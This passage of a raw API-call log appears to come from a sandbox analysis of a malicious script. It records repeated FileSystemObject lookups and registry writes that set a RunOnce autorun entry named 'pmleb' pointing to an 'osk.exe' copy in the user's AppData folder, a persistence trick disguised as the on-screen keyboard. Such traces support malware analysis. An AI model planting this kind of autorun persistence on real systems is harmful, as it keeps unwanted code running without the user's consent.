cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.501] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.501] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.501] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.502] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3a [0081.502] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.502] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3b [0081.502] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.503] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3a [0081.503] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.503] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.503] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.503] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.503] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.503] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.503] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.504] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.504] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.504] RegCloseKey (hKey=0x280) returned 0x0 [0081.504] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.504] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.504] SetTimer (hWnd=0x20280, nIDEvent=0x20b6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b6 [0081.504] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.516] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.516] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.516] KillTimer (hWnd=0x20280, uIDEvent=0x20b6) returned 1 [0081.516] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.516] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.516] IUnknown:Release (This=0x787518) returned 0x1 [0081.516] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.517] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.517] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.517] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.517] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3b [0081.517] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.517] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3c [0081.517] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.518] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3b [0081.518] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.518] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.519] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.519] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.519] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.519] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.519] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.519] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.519] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.519] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.520] RegCloseKey (hKey=0x280) returned 0x0 [0081.520] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.520] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.520] SetTimer (hWnd=0x20280, nIDEvent=0x20b7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b7 [0081.520] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.531] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.531] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.531] KillTimer (hWnd=0x20280, uIDEvent=0x20b7) returned 1 [0081.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.532] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.532] IUnknown:Release (This=0x787518) returned 0x1 [0081.532] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.532] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.532] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.532] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.533] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.533] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3c [0081.533] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.533] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3d [0081.533] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.534] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3c [0081.534] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.534] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.534] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.534] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.534] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.534] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.534] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.534] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.535] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.535] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.535] RegCloseKey (hKey=0x280) returned 0x0 [0081.535] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.535] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.535] SetTimer (hWnd=0x20280, nIDEvent=0x20b8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b8 [0081.535] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.558] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.558] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.558] KillTimer (hWnd=0x20280, uIDEvent=0x20b8) returned 1 [0081.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.558] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 